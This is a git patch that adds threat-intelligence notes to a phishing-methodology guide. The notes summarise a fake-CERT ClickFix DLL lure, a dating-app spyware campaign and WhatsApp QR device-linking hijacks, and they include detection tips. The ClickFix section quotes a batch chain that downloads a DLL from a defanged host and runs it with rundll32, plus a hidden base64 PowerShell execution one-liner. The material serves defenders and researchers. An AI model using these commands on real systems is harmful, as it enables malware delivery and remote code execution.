From ae9ad206cee6ef9d0aaf9dfbf023f33282798b4a Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 29 Jan 2026 01:55:07 +0000 Subject: [PATCH] Add content from: Love? Actually: Fake dating app used as lure in targeted spy... --- .../phishing-methodology/README.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index 536b6a46c80..ff147a95145 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -526,6 +526,22 @@ Commodity crews offset the cost of high-touch ops with mass attacks that turn ** ``` * Hunt for LOLBins frequently abused by first-stage loaders (e.g. `regsvr32`, `curl`, `mshta`). +### ClickFix DLL delivery tradecraft (fake CERT update) +* Lure: cloned national CERT advisory with an **Update** button that displays step-by-step “fix” instructions. Victims are told to run a batch that downloads a DLL and executes it via `rundll32`. +* Typical batch chain observed: + ```cmd + echo powershell -Command "Invoke-WebRequest -Uri 'https://example[.]org/notepad2.dll' -OutFile '%TEMP%\notepad2.dll'" + echo timeout /t 10 + echo rundll32.exe "%TEMP%\notepad2.dll",notepad + ``` + * `Invoke-WebRequest` drops the payload to `%TEMP%`, a short sleep hides network jitter, then `rundll32` calls the exported entrypoint (`notepad`). +* The DLL beacons host identity and polls C2 every few minutes. Remote tasking arrives as **base64-encoded PowerShell** executed hidden and with policy bypass: + ```powershell + powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('')) | Invoke-Expression" + ``` + * This preserves C2 flexibility (server can swap tasks without updating the DLL) and hides console windows. Hunt for PowerShell children of `rundll32.exe` using `-WindowStyle Hidden` + `FromBase64String` + `Invoke-Expression` together. +* Defenders can look for HTTP(S) callbacks of the form `...page.php?tynor=sss` and 5-minute polling intervals after DLL load. + --- ## AI-Enhanced Phishing Operations @@ -611,6 +627,15 @@ clipboard-hijacking.md mobile-phishing-malicious-apps.md {{#endref}} +### Romance-gated APK + WhatsApp pivot (dating-app lure) +* The APK embeds static credentials and per-profile “unlock codes” (no server auth). Victims follow a fake exclusivity flow (login → locked profiles → unlock) and, on correct codes, are redirected into WhatsApp chats with attacker-controlled `+92` numbers while spyware runs silently. +* Collection starts even before login: immediate exfil of **device ID**, contacts (as `.txt` from cache), and documents (images/PDF/Office/OpenXML). A content observer auto-uploads new photos; a scheduled job re-scans for new documents every **5 minutes**. +* Persistence: registers for `BOOT_COMPLETED` and keeps a **foreground service** alive to survive reboots and background evictions. + +### WhatsApp device-linking hijack via QR social engineering +* A lure page (e.g., fake ministry/CERT “channel”) displays a WhatsApp Web/Desktop QR and instructs the victim to scan it, silently adding the attacker as a **linked device**. +* Attacker immediately gains chat/contact visibility until the session is removed. Victims may later see a “new device linked” notification; defenders can hunt for unexpected device-link events shortly after visits to untrusted QR pages. + ### Mobile‑gated phishing to evade crawlers/sandboxes Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow. @@ -651,6 +676,8 @@ Defence tips: - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/) - [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) - [The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time](https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/) +- [Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan](https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/) +- [ESET GhostChat IoCs and samples](https://github.com/eset/malware-ioc/tree/master/ghostchat) {{#include ../../banners/hacktricks-training.md}}